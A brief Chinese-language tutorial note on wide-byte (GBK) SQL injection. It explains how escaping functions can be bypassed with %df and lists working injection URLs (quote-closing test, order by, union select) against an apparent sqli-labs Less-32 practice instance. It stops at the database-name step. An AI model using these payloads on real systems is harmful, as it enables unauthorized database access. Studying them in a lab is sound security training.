1、函數(shù)

過濾輸入的函數(shù)：
addslashes
mysql_real_escape_string 
mysql_escape_string

當(dāng)字符的大小為一個(gè)字節(jié)時(shí)，稱之為窄字節(jié) 例如ascii編碼
當(dāng)字符的大小為兩個(gè)字節(jié)時(shí)，稱之為寬字節(jié) 例如GB2312、GBK、GB8030

mysql使用GBK編碼時(shí),默認(rèn)的會(huì)認(rèn)為兩個(gè)字符為一個(gè)漢字,前一個(gè)字符的ascii值大于128,達(dá)到漢字范圍

2、寬字節(jié)注入

原理：
?當(dāng)我們的mysql使用GBK編碼后，同時(shí)兩個(gè)字符的前一個(gè)字符ASCII碼大于128時(shí)，會(huì)將兩個(gè)字符認(rèn)成一個(gè)漢字。
?當(dāng)注入點(diǎn)使用轉(zhuǎn)義函數(shù)對(duì)輸入的特殊字符進(jìn)行轉(zhuǎn)義時(shí)，考慮寬字節(jié)注入。

'----->\'

ascii 單字節(jié)
GBK 寬字節(jié)

??（1）判斷閉合方式

http://124.222.124.9:8888/Less-32/?id=1%df' and 1=2 %23

??（2）判斷列數(shù)

http://124.222.124.9:8888/Less-32/?id=1%df' order by 3%23

??（3）查看回顯位置

http://124.222.124.9:8888/Less-32/?id=-1%df' union select 1,2,3%23

??（4）查看庫名